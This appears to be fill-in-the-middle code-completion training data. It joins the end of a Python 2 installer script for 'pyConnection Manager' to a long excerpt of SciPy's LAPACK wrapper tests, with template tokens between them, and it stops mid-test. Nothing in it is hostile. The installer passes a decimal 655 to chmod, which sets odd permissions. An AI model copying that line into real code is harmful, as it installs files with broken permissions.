except OSError, IOError:
print "ERROR installing pyConnection Manager"
sys.exit()
ok = "\n\tpyConnection Manager succesfully installed\n"
print ok
def remove_old():
if os.path.exists(module_path):
shutil.rmtree(module_path)
if os.path.exists(GLADE_DIR):
shutil.rmtree(GLADE_DIR)
if os.path.exists(IMAGE_DIR):
shutil.rmtree(IMAGE_DIR)
if os.path.exists(bin_exe):
os.remove(bin_exe)
if os.path.exists(launcher):
os.remove(launcher)
def create_new():
shutil.copytree('pycm', module_path)
shutil.copytree('glade', GLADE_DIR)
shutil.copytree('img', IMAGE_DIR)
shutil.copyfile('pycm.py', '/usr/bin/pycm')
shutil.copyfile('pyconnection-manager.desktop', launcher)
dir_list = [module_path, GLADE_DIR, IMAGE_DIR]
for i in dir_list:
os.chmod(i, 655)
__init__()<|fim▁end|> | sys.exit()
|
<|file_name|>test_lapack.py<|end_file_name|><|fim▁begin|>#
# Created by: Pearu Peterson, September 2002
#
import sys
import subprocess
import time
from functools import reduce
from numpy.testing import (assert_equal, assert_array_almost_equal, assert_,
assert_allclose, assert_almost_equal,
assert_array_equal)
import pytest
from pytest import raises as assert_raises
import numpy as np
from numpy import (eye, ones, zeros, zeros_like, triu, tril, tril_indices,
triu_indices)
from numpy.random import rand, randint, seed
from scipy.linalg import (_flapack as flapack, lapack, inv, svd, cholesky,
solve, ldl, norm, block_diag, qr, eigh)
from scipy.linalg.lapack import _compute_lwork
from scipy.stats import ortho_group, unitary_group
import scipy.sparse as sps
try:
from scipy.linalg import _clapack as clapack
except ImportError:
clapack = None
from scipy.linalg.lapack import get_lapack_funcs
from scipy.linalg.blas import get_blas_funcs
REAL_DTYPES = [np.float32, np.float64]
COMPLEX_DTYPES = [np.complex64, np.complex128]
DTYPES = REAL_DTYPES + COMPLEX_DTYPES
def generate_random_dtype_array(shape, dtype):
# generates a random matrix of desired data type of shape
if dtype in COMPLEX_DTYPES:
return (np.random.rand(*shape)
+ np.random.rand(*shape)*1.0j).astype(dtype)
return np.random.rand(*shape).astype(dtype)
def test_lapack_documented():
"""Test that all entries are in the doc."""
if lapack.__doc__ is None: # just in case there is a python -OO
pytest.skip('lapack.__doc__ is None')
names = set(lapack.__doc__.split())
ignore_list = set([
'absolute_import', 'clapack', 'division', 'find_best_lapack_type',
'flapack', 'print_function', 'HAS_ILP64',
])
missing = list()
for name in dir(lapack):
if (not name.startswith('_') and name not in ignore_list and
name not in names):
missing.append(name)
assert missing == [], 'Name(s) missing from lapack.__doc__ or ignore_list'
class TestFlapackSimple:
def test_gebal(self):
a = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a1 = [[1, 0, 0, 3e-4],
[4, 0, 0, 2e-3],
[7, 1, 0, 0],
[0, 1, 0, 0]]
for p in 'sdzc':
f = getattr(flapack, p+'gebal', None)
if f is None:
continue
ba, lo, hi, pivscale, info = f(a)
assert_(not info, repr(info))
assert_array_almost_equal(ba, a)
assert_equal((lo, hi), (0, len(a[0])-1))
assert_array_almost_equal(pivscale, np.ones(len(a)))
ba, lo, hi, pivscale, info = f(a1, permute=1, scale=1)
assert_(not info, repr(info))
# print(a1)
# print(ba, lo, hi, pivscale)
def test_gehrd(self):
a = [[-149, -50, -154],
[537, 180, 546],
[-27, -9, -25]]
for p in 'd':
f = getattr(flapack, p+'gehrd', None)
if f is None:
continue
ht, tau, info = f(a)
assert_(not info, repr(info))
def test_trsyl(self):
a = np.array([[1, 2], [0, 4]])
b = np.array([[5, 6], [0, 8]])
c = np.array([[9, 10], [11, 12]])
trans = 'T'
# Test single and double implementations, including most
# of the options
for dtype in 'fdFD':
a1, b1, c1 = a.astype(dtype), b.astype(dtype), c.astype(dtype)
trsyl, = get_lapack_funcs(('trsyl',), (a1,))
if dtype.isupper(): # is complex dtype
a1[0] += 1j
trans = 'C'
x, scale, info = trsyl(a1, b1, c1)
assert_array_almost_equal(np.dot(a1, x) + np.dot(x, b1),
scale * c1)
x, scale, info = trsyl(a1, b1, c1, trana=trans, tranb=trans)
assert_array_almost_equal(
np.dot(a1.conjugate().T, x) + np.dot(x, b1.conjugate().T),
scale * c1, decimal=4)
x, scale, info = trsyl(a1, b1, c1, isgn=-1)
assert_array_almost_equal(np.dot(a1, x) - np.dot(x, b1),
scale * c1, decimal=4)
def test_lange(self):
a = np.array([
[-149, -50, -154],
[537, 180, 546],
[-27, -9, -25]])
for dtype in 'fdFD':
for norm_str in 'Mm1OoIiFfEe':
a1 = a.astype(dtype)
if dtype.isupper():
# is complex dtype
a1[0, 0] += 1j
lange, = get_lapack_funcs(('lange',), (a1,))
value = lange(norm_str, a1)
if norm_str in 'FfEe':
if dtype in 'Ff':
decimal = 3
else:
decimal = 7
ref = np.sqrt(np.sum(np.square(np.abs(a1))))
assert_almost_equal(value, ref, decimal)
else:
if norm_str in 'Mm':
ref = np.max(np.abs(a1))
elif norm_str in '1Oo':
ref = np.max(np.sum(np.abs(a1), axis=0))
elif norm_str in 'Ii':
ref = np.max(np.sum(np.abs(a1), axis=1))
assert_equal(value, ref)
class TestLapack:
def test_flapack(self):
if hasattr(flapack, 'empty_module'):
# flapack module is empty
pass
def test_clapack(self):
if hasattr(clapack, 'empty_module'):
# clapack module is empty
pass
class TestLeastSquaresSolvers:
def test_gels(self):
seed(1234)
# Test fat/tall matrix argument handling - gh-issue #8329
for ind, dtype in enumerate(DTYPES):
m = 10
n = 20
nrhs = 1
a1 = rand(m, n).astype(dtype)
b1 = rand(n).astype(dtype)
gls, glslw = get_lapack_funcs(('gels', 'gels_lwork'), dtype=dtype)
# Request of sizes
lwork = _compute_lwork(glslw, m, n, nrhs)
_, _, info = gls(a1, b1, lwork=lwork)
assert_(info >= 0)
_, _, info = gls(a1, b1, trans='TTCC'[ind], lwork=lwork)
assert_(info >= 0)
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
gels, gels_lwork, geqrf = get_lapack_funcs(
('gels', 'gels_lwork', 'geqrf'), (a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
lwork = _compute_lwork(gels_lwork, m, n, nrhs)
lqr, x, info = gels(a1, b1, lwork=lwork)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
lqr_truth, _, _, _ = geqrf(a1)
assert_array_equal(lqr, lqr_truth)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
gels, gels_lwork, geqrf = get_lapack_funcs(
('gels', 'gels_lwork', 'geqrf'), (a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
lwork = _compute_lwork(gels_lwork, m, n, nrhs)
lqr, x, info = gels(a1, b1, lwork=lwork)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1.521240901196909j],
dtype=dtype), rtol=25*np.finfo(dtype).eps)
lqr_truth, _, _, _ = geqrf(a1)
assert_array_equal(lqr, lqr_truth)
def test_gelsd(self):
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
gelsd, gelsd_lwork = get_lapack_funcs(('gelsd', 'gelsd_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, iwork, info = gelsd_lwork(m, n, nrhs, -1)
lwork = int(np.real(work))
iwork_size = iwork
x, s, rank, info = gelsd(a1, b1, lwork, iwork_size,
-1, False, False)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
assert_allclose(s, np.array([12.596017180511966,
0.583396253199685], dtype=dtype),
rtol=25*np.finfo(dtype).eps)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
gelsd, gelsd_lwork = get_lapack_funcs(('gelsd', 'gelsd_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, rwork, iwork, info = gelsd_lwork(m, n, nrhs, -1)
lwork = int(np.real(work))
rwork_size = int(rwork)
iwork_size = iwork
x, s, rank, info = gelsd(a1, b1, lwork, rwork_size, iwork_size,
-1, False, False)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1.521240901196909j],
dtype=dtype), rtol=25*np.finfo(dtype).eps)
assert_allclose(s,
np.array([13.035514762572043, 4.337666985231382],
dtype=dtype), rtol=25*np.finfo(dtype).eps)
def test_gelss(self):
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
gelss, gelss_lwork = get_lapack_funcs(('gelss', 'gelss_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, info = gelss_lwork(m, n, nrhs, -1)
lwork = int(np.real(work))
v, x, s, rank, work, info = gelss(a1, b1, -1, lwork, False, False)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
assert_allclose(s, np.array([12.596017180511966,
0.583396253199685], dtype=dtype),
rtol=25*np.finfo(dtype).eps)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
gelss, gelss_lwork = get_lapack_funcs(('gelss', 'gelss_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, info = gelss_lwork(m, n, nrhs, -1)
lwork = int(np.real(work))
v, x, s, rank, work, info = gelss(a1, b1, -1, lwork, False, False)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1.521240901196909j],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
assert_allclose(s, np.array([13.035514762572043,
4.337666985231382], dtype=dtype),
rtol=25*np.finfo(dtype).eps)
def test_gelsy(self):
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
gelsy, gelsy_lwork = get_lapack_funcs(('gelsy', 'gelss_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, info = gelsy_lwork(m, n, nrhs, 10*np.finfo(dtype).eps)
lwork = int(np.real(work))
jptv = np.zeros((a1.shape[1], 1), dtype=np.int32)
v, x, j, rank, info = gelsy(a1, b1, jptv, np.finfo(dtype).eps,
lwork, False, False)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
gelsy, gelsy_lwork = get_lapack_funcs(('gelsy', 'gelss_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, info = gelsy_lwork(m, n, nrhs, 10*np.finfo(dtype).eps)
lwork = int(np.real(work))
jptv = np.zeros((a1.shape[1], 1), dtype=np.int32)
v, x, j, rank, info = gelsy(a1, b1, jptv, np.finfo(dtype).eps,
lwork, False, False)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1.521240901196909j],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
@pytest.mark.parametrize('dtype', DTYPES)
@pytest.mark.parametrize('shape', [(3, 4), (5, 2), (2**18, 2**18)])
def test_geqrf_lwork(dtype, shape):
geqrf_lwork = get_lapack_funcs(('geqrf_lwork'), dtype=dtype)
m, n = shape
lwork, info = geqrf_lwork(m=m, n=n)
assert_equal(info, 0)
class TestRegression:<|fim▁hole|> # Check that RQ routines have correct lwork
for dtype in DTYPES:
a = np.zeros((300, 2), dtype=dtype)
gerqf, = get_lapack_funcs(['gerqf'], [a])
assert_raises(Exception, gerqf, a, lwork=2)
rq, tau, work, info = gerqf(a)
if dtype in REAL_DTYPES:
orgrq, = get_lapack_funcs(['orgrq'], [a])
assert_raises(Exception, orgrq, rq[-2:], tau, lwork=1)
orgrq(rq[-2:], tau, lwork=2)
elif dtype in COMPLEX_DTYPES:
ungrq, = get_lapack_funcs(['ungrq'], [a])
assert_raises(Exception, ungrq, rq[-2:], tau, lwork=1)
ungrq(rq[-2:], tau, lwork=2)
class TestDpotr:
def test_gh_2691(self):
# 'lower' argument of dportf/dpotri
for lower in [True, False]:
for clean in [True, False]:
np.random.seed(42)
x = np.random.normal(size=(3, 3))
a = x.dot(x.T)
dpotrf, dpotri = get_lapack_funcs(("potrf", "potri"), (a, ))
c, info = dpotrf(a, lower, clean=clean)
dpt = dpotri(c, lower)[0]
if lower:
assert_allclose(np.tril(dpt), np.tril(inv(a)))
else:
assert_allclose(np.triu(dpt), np.triu(inv(a)))
class TestDlasd4:
def test_sing_val_update(self):
sigmas = np.array([4., 3., 2., 0])
m_vec = np.array([3.12, 5.7, -4.8, -2.2])
M = np.hstack((np.vstack((np.diag(sigmas[0:-1]),
np.zeros((1, len(m_vec) - 1)))),
m_vec[:, np.newaxis]))
SM = svd(M, full_matrices=False, compute_uv=False, overwrite_a=False,
check_finite=False)
it_len = len(sigmas)
sgm = np.concatenate((sigmas[::-1], [sigmas[0] + it_len*norm(m_vec)]))
mvc = np.concatenate((m_vec[::-1], (0,)))
lasd4 = get_lapack_funcs('lasd4', (sigmas,))
roots = []
for i in range(0, it_len):
res = lasd4(i, sgm, mvc)
roots.append(res[1])
assert_((res[3] <= 0), "LAPACK root finding dlasd4 failed to find \
the singular value %i" % i)
roots = np.array(roots)[::-1]
assert_((not np.any(np.isnan(roots)), "There are NaN roots"))
assert_allclose(SM, roots, atol=100*np.finfo(np.float64).eps,
rtol=100*np.finfo(np.float64).eps)
class TestTbtrs:
@pytest.mark.parametrize('dtype', DTYPES)
def test_nag_example_f07vef_f07vsf(self, dtype):
"""Test real (f07vef) and complex (f07vsf) examples from NAG
Examples available from:
* https://www.nag.com/numeric/fl/nagdoc_latest/html/f07/f07vef.html
* https://www.nag.com/numeric/fl/nagdoc_latest/html/f07/f07vsf.html
"""
if dtype in REAL_DTYPES:
ab = np.array([[-4.16, 4.78, 6.32, 0.16],
[-2.25, 5.86, -4.82, 0]],
dtype=dtype)
b = np.array([[-16.64, -4.16],
[-13.78, -16.59],
[13.10, -4.94],
[-14.14, -9.96]],
dtype=dtype)
x_out = np.array([[4, 1],
[-1, -3],
[3, 2],
[2, -2]],
dtype=dtype)
elif dtype in COMPLEX_DTYPES:
ab = np.array([[-1.94+4.43j, 4.12-4.27j, 0.43-2.66j, 0.44+0.1j],
[-3.39+3.44j, -1.84+5.52j, 1.74 - 0.04j, 0],
[1.62+3.68j, -2.77-1.93j, 0, 0]],
dtype=dtype)
b = np.array([[-8.86 - 3.88j, -24.09 - 5.27j],
[-15.57 - 23.41j, -57.97 + 8.14j],
[-7.63 + 22.78j, 19.09 - 29.51j],
[-14.74 - 2.40j, 19.17 + 21.33j]],
dtype=dtype)
x_out = np.array([[2j, 1 + 5j],
[1 - 3j, -7 - 2j],
[-4.001887 - 4.988417j, 3.026830 + 4.003182j],
[1.996158 - 1.045105j, -6.103357 - 8.986653j]],
dtype=dtype)
else:
raise ValueError(f"Datatype {dtype} not understood.")
tbtrs = get_lapack_funcs(('tbtrs'), dtype=dtype)
x, info = tbtrs(ab=ab, b=b, uplo='L')
assert_equal(info, 0)
assert_allclose(x, x_out, rtol=0, atol=1e-5)
@pytest.mark.parametrize('dtype,trans',
[(dtype, trans)
for dtype in DTYPES for trans in ['N', 'T', 'C']
if not (trans == 'C' and dtype in REAL_DTYPES)])
@pytest.mark.parametrize('uplo', ['U', 'L'])
@pytest.mark.parametrize('diag', ['N', 'U'])
def test_random_matrices(self, dtype, trans, uplo, diag):
seed(1724)
# n, nrhs, kd are used to specify A and b.
# A is of shape n x n with kd super/sub-diagonals
# b is of shape n x nrhs matrix
n, nrhs, kd = 4, 3, 2
tbtrs = get_lapack_funcs('tbtrs', dtype=dtype)
is_upper = (uplo == 'U')
ku = kd * is_upper
kl = kd - ku
# Construct the diagonal and kd super/sub diagonals of A with
# the corresponding offsets.
band_offsets = range(ku, -kl - 1, -1)
band_widths = [n - abs(x) for x in band_offsets]
bands = [generate_random_dtype_array((width,), dtype)
for width in band_widths]
if diag == 'U': # A must be unit triangular
bands[ku] = np.ones(n, dtype=dtype)
# Construct the diagonal banded matrix A from the bands and offsets.
a = sps.diags(bands, band_offsets, format='dia')
# Convert A into banded storage form
ab = np.zeros((kd + 1, n), dtype)
for row, k in enumerate(band_offsets):
ab[row, max(k, 0):min(n+k, n)] = a.diagonal(k)
# The RHS values.
b = generate_random_dtype_array((n, nrhs), dtype)
x, info = tbtrs(ab=ab, b=b, uplo=uplo, trans=trans, diag=diag)
assert_equal(info, 0)
if trans == 'N':
assert_allclose(a @ x, b, rtol=5e-5)
elif trans == 'T':
assert_allclose(a.T @ x, b, rtol=5e-5)
elif trans == 'C':
assert_allclose(a.H @ x, b, rtol=5e-5)
else:
raise ValueError('Invalid trans argument')
@pytest.mark.parametrize('uplo,trans,diag',
[['U', 'N', 'Invalid'],
['U', 'Invalid', 'N'],
['Invalid', 'N', 'N']])
def test_invalid_argument_raises_exception(self, uplo, trans, diag):
"""Test if invalid values of uplo, trans and diag raise exceptions"""
# Argument checks occur independently of used datatype.
# This mean we must not parameterize all available datatypes.
tbtrs = get_lapack_funcs('tbtrs', dtype=np.float64)
ab = rand(4, 2)
b = rand(2, 4)
assert_raises(Exception, tbtrs, ab, b, uplo, trans, diag)
def test_zero_element_in_diagonal(self):
"""Test if a matrix with a zero diagonal element is singular
If the i-th diagonal of A is zero, ?tbtrs should return `i` in `info`
indicating the provided matrix is singular.
Note that ?tbtrs requires the matrix A to be stored in banded form.
In this form the diagonal corresponds to the last row."""
ab = np.ones((3, 4), dtype=float)
b = np.ones(4, dtype=float)
tbtrs = get_lapack_funcs('tbtrs', dtype=float)
ab[-1, 3] = 0
_, info = tbtrs(ab=ab, b=b, uplo='U')
assert_equal(info, 4)
@pytest.mark.parametrize('ldab,n,ldb,nrhs', [
(5, 5, 0, 5),
(5, 5, 3, 5)
])
def test_invalid_matrix_shapes(self, ldab, n, ldb, nrhs):
"""Test ?tbtrs fails correctly if shapes are invalid."""
ab = np.ones((ldab, n), dtype=float)
b = np.ones((ldb, nrhs), dtype=float)
tbtrs = get_lapack_funcs('tbtrs', dtype=float)
assert_raises(Exception, tbtrs, ab, b)
def test_lartg():
for dtype in 'fdFD':
lartg = get_lapack_funcs('lartg', dtype=dtype)
f = np.array(3, dtype)
g = np.array(4, dtype)
if np.iscomplexobj(g):
g *= 1j
cs, sn, r = lartg(f, g)
assert_allclose(cs, 3.0/5.0)
assert_allclose(r, 5.0)
if np.iscomplexobj(g):
assert_allclose(sn, -4.0j/5.0)
assert_(type(r) == complex)
assert_(type(cs) == float)
else:
assert_allclose(sn, 4.0/5.0)
def test_rot():
# srot, drot from blas and crot and zrot from lapack.
for dtype in 'fdFD':
c = 0.6
s = 0.8
u = np.full(4, 3, dtype)
v = np.full(4, 4, dtype)
atol = 10**-(np.finfo(dtype).precision-1)
if dtype in 'fd':
rot = get_blas_funcs('rot', dtype=dtype)
f = 4
else:
rot = get_lapack_funcs('rot', dtype=dtype)
s *= -1j
v *= 1j
f = 4j
assert_allclose(rot(u, v, c, s), [[5, 5, 5, 5],
[0, 0, 0, 0]], atol=atol)
assert_allclose(rot(u, v, c, s, n=2), [[5, 5, 3, 3],
[0, 0, f, f]], atol=atol)
assert_allclose(rot(u, v, c, s, offx=2, offy=2),
[[3, 3, 5, 5], [f, f, 0, 0]], atol=atol)
assert_allclose(rot(u, v, c, s, incx=2, offy=2, n=2),
[[5, 3, 5, 3], [f, f, 0, 0]], atol=atol)
assert_allclose(rot(u, v, c, s, offx=2, incy=2, n=2),
[[3, 3, 5, 5], [0, f, 0, f]], atol=atol)
assert_allclose(rot(u, v, c, s, offx=2, incx=2, offy=2, incy=2, n=1),
[[3, 3, 5, 3], [f, f, 0, f]], atol=atol)
assert_allclose(rot(u, v, c, s, incx=-2, incy=-2, n=2),
[[5, 3, 5, 3], [0, f, 0, f]], atol=atol)
a, b = rot(u, v, c, s, overwrite_x=1, overwrite_y=1)
assert_(a is u)
assert_(b is v)
assert_allclose(a, [5, 5, 5, 5], atol=atol)
assert_allclose(b, [0, 0, 0, 0], atol=atol)
def test_larfg_larf():
np.random.seed(1234)
a0 = np.random.random((4, 4))
a0 = a0.T.dot(a0)
a0j = np.random.random((4, 4)) + 1j*np.random.random((4, 4))
a0j = a0j.T.conj().dot(a0j)
# our test here will be to do one step of reducing a hermetian matrix to
# tridiagonal form using householder transforms.
for dtype in 'fdFD':
larfg, larf = get_lapack_funcs(['larfg', 'larf'], dtype=dtype)
if dtype in 'FD':
a = a0j.copy()
else:
a = a0.copy()
# generate a householder transform to clear a[2:,0]
alpha, x, tau = larfg(a.shape[0]-1, a[1, 0], a[2:, 0])
# create expected output
expected = np.zeros_like(a[:, 0])
expected[0] = a[0, 0]
expected[1] = alpha
# assemble householder vector
v = np.zeros_like(a[1:, 0])
v[0] = 1.0
v[1:] = x
# apply transform from the left
a[1:, :] = larf(v, tau.conjugate(), a[1:, :], np.zeros(a.shape[1]))
# apply transform from the right
a[:, 1:] = larf(v, tau, a[:, 1:], np.zeros(a.shape[0]), side='R')
assert_allclose(a[:, 0], expected, atol=1e-5)
assert_allclose(a[0, :], expected, atol=1e-5)
@pytest.mark.xslow
def test_sgesdd_lwork_bug_workaround():
# Test that SGESDD lwork is sufficiently large for LAPACK.
#
# This checks that workaround around an apparent LAPACK bug
# actually works. cf. gh-5401
#
# xslow: requires 1GB+ of memory
p = subprocess.Popen([sys.executable, '-c',
'import numpy as np; '
'from scipy.linalg import svd; '
'a = np.zeros([9537, 9537], dtype=np.float32); '
'svd(a)'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# Check if it an error occurred within 5 sec; the computation can
# take substantially longer, and we will not wait for it to finish
for j in range(50):
time.sleep(0.1)
if p.poll() is not None:
returncode = p.returncode
break
else:
# Didn't exit in time -- probably entered computation. The
# error is raised before entering computation, so things are
# probably OK.
returncode = 0
p.terminate()
assert_equal(returncode, 0,
"Code apparently failed: " + p.stdout.read().decode())
class TestSytrd:
@pytest.mark.parametrize('dtype', REAL_DTYPES)
def test_sytrd_with_zero_dim_array(self, dtype):
# Assert that a 0x0 matrix raises an error
A = np.zeros((0, 0), dtype=dtype)
sytrd = get_lapack_funcs('sytrd', (A,))
assert_raises(ValueError, sytrd, A)
@pytest.mark.parametrize('dtype', REAL_DTYPES)
@pytest.mark.parametrize('n', (1, 3))
def test_sytrd(self, dtype, n):
A = np.zeros((n, n), dtype=dtype)
sytrd, sytrd_lwork = \
get_lapack_funcs(('sytrd', 'sytrd_lwork'), (A,))
# some upper triangular array
A[np.triu_indices_from(A)] = \
np.arange(1, n*(n+1)//2+1, dtype=dtype)
# query lwork
lwork, info = sytrd_lwork(n)
assert_equal(info, 0)
# check lower=1 behavior (shouldn't do much since the matrix is
# upper triangular)
data, d, e, tau, info = sytrd(A, lower=1, lwork=lwork)
assert_equal(info, 0)
assert_allclose(data, A, atol=5*np.finfo(dtype).eps, rtol=1.0)
assert_allclose(d, np.diag(A))
assert_allclose(e, 0.0)
assert_allclose(tau, 0.0)
# and now for the proper test (lower=0 is the default)
data, d, e, tau, info = sytrd(A, lwork=lwork)
assert_equal(info, 0)
# assert Q^T*A*Q = tridiag(e, d, e)
# build tridiagonal matrix
T = np.zeros_like(A, dtype=dtype)
k = np.arange(A.shape[0])
T[k, k] = d
k2 = np.arange(A.shape[0]-1)
T[k2+1, k2] = e
T[k2, k2+1] = e
# build Q
Q = np.eye(n, n, dtype=dtype)
for i in range(n-1):
v = np.zeros(n, dtype=dtype)
v[:i] = data[:i, i+1]
v[i] = 1.0
H = np.eye(n, n, dtype=dtype) - tau[i] * np.outer(v, v)
Q = np.dot(H, Q)
# Make matrix fully symmetric
i_lower = np.tril_indices(n, -1)
A[i_lower] = A.T[i_lower]
QTAQ = np.dot(Q.T, np.dot(A, Q))
# disable rtol here since some values in QTAQ and T are very close
# to 0.
assert_allclose(QTAQ, T, atol=5*np.finfo(dtype).eps, rtol=1.0)
class TestHetrd:
@pytest.mark.parametrize('complex_dtype', COMPLEX_DTYPES)
def test_hetrd_with_zero_dim_array(self, complex_dtype):
# Assert that a 0x0 matrix raises an error
A = np.zeros((0, 0), dtype=complex_dtype)
hetrd = get_lapack_funcs('hetrd', (A,))
assert_raises(ValueError, hetrd, A)
@pytest.mark.parametrize('real_dtype,complex_dtype',
zip(REAL_DTYPES, COMPLEX_DTYPES))
@pytest.mark.parametrize('n', (1, 3))
def test_hetrd(self, n, real_dtype, complex_dtype):
A = np.zeros((n, n), dtype=complex_dtype)
hetrd, hetrd_lwork = \
get_lapack_funcs(('hetrd', 'hetrd_lwork'), (A,))
# some upper triangular array
A[np.triu_indices_from(A)] = (
np.arange(1, n*(n+1)//2+1, dtype=real_dtype)
+ 1j * np.arange(1, n*(n+1)//2+1, dtype=real_dtype)
)
np.fill_diagonal(A, np.real(np.diag(A)))
# test query lwork
for x in [0, 1]:
_, info = hetrd_lwork(n, lower=x)
assert_equal(info, 0)
# lwork returns complex which segfaults hetrd call (gh-10388)
# use the safe and recommended option
lwork = _compute_lwork(hetrd_lwork, n)
# check lower=1 behavior (shouldn't do much since the matrix is
# upper triangular)
data, d, e, tau, info = hetrd(A, lower=1, lwork=lwork)
assert_equal(info, 0)
assert_allclose(data, A, atol=5*np.finfo(real_dtype).eps, rtol=1.0)
assert_allclose(d, np.real(np.diag(A)))
assert_allclose(e, 0.0)
assert_allclose(tau, 0.0)
# and now for the proper test (lower=0 is the default)
data, d, e, tau, info = hetrd(A, lwork=lwork)
assert_equal(info, 0)
# assert Q^T*A*Q = tridiag(e, d, e)
# build tridiagonal matrix
T = np.zeros_like(A, dtype=real_dtype)
k = np.arange(A.shape[0], dtype=int)
T[k, k] = d
k2 = np.arange(A.shape[0]-1, dtype=int)
T[k2+1, k2] = e
T[k2, k2+1] = e
# build Q
Q = np.eye(n, n, dtype=complex_dtype)
for i in range(n-1):
v = np.zeros(n, dtype=complex_dtype)
v[:i] = data[:i, i+1]
v[i] = 1.0
H = np.eye(n, n, dtype=complex_dtype) \
- tau[i] * np.outer(v, np.conj(v))
Q = np.dot(H, Q)
# Make matrix fully Hermitian
i_lower = np.tril_indices(n, -1)
A[i_lower] = np.conj(A.T[i_lower])
QHAQ = np.dot(np.conj(Q.T), np.dot(A, Q))
# disable rtol here since some values in QTAQ and T are very close
# to 0.
assert_allclose(
QHAQ, T, atol=10*np.finfo(real_dtype).eps, rtol=1.0
)
def test_gglse():
# Example data taken from NAG manual
for ind, dtype in enumerate(DTYPES):
# DTYPES = <s,d,c,z> gglse
func, func_lwork = get_lapack_funcs(('gglse', 'gglse_lwork'),
dtype=dtype)
lwork = _compute_lwork(func_lwork, m=6, n=4, p=2)
# For <s,d>gglse
if ind < 2:
a = np.array([[-0.57, -1.28, -0.39, 0.25],
[-1.93, 1.08, -0.31, -2.14],
[2.30, 0.24, 0.40, -0.35],
[-1.93, 0.64, -0.66, 0.08],
[0.15, 0.30, 0.15, -2.13],
[-0.02, 1.03, -1.43, 0.50]], dtype=dtype)
c = np.array([-1.50, -2.14, 1.23, -0.54, -1.68, 0.82], dtype=dtype)
d = np.array([0., 0.], dtype=dtype)
# For <s,d>gglse
else:
a = np.array([[0.96-0.81j, -0.03+0.96j, -0.91+2.06j, -0.05+0.41j],
[-0.98+1.98j, -1.20+0.19j, -0.66+0.42j, -0.81+0.56j],
[0.62-0.46j, 1.01+0.02j, 0.63-0.17j, -1.11+0.60j],
[0.37+0.38j, 0.19-0.54j, -0.98-0.36j, 0.22-0.20j],
[0.83+0.51j, 0.20+0.01j, -0.17-0.46j, 1.47+1.59j],
[1.08-0.28j, 0.20-0.12j, -0.07+1.23j, 0.26+0.26j]])
c = np.array([[-2.54+0.09j],
[1.65-2.26j],
[-2.11-3.96j],
[1.82+3.30j],
[-6.41+3.77j],
[2.07+0.66j]])
d = np.zeros(2, dtype=dtype)
b = np.array([[1., 0., -1., 0.], [0., 1., 0., -1.]], dtype=dtype)
_, _, _, result, _ = func(a, b, c, d, lwork=lwork)
if ind < 2:
expected = np.array([0.48904455,
0.99754786,
0.48904455,
0.99754786])
else:
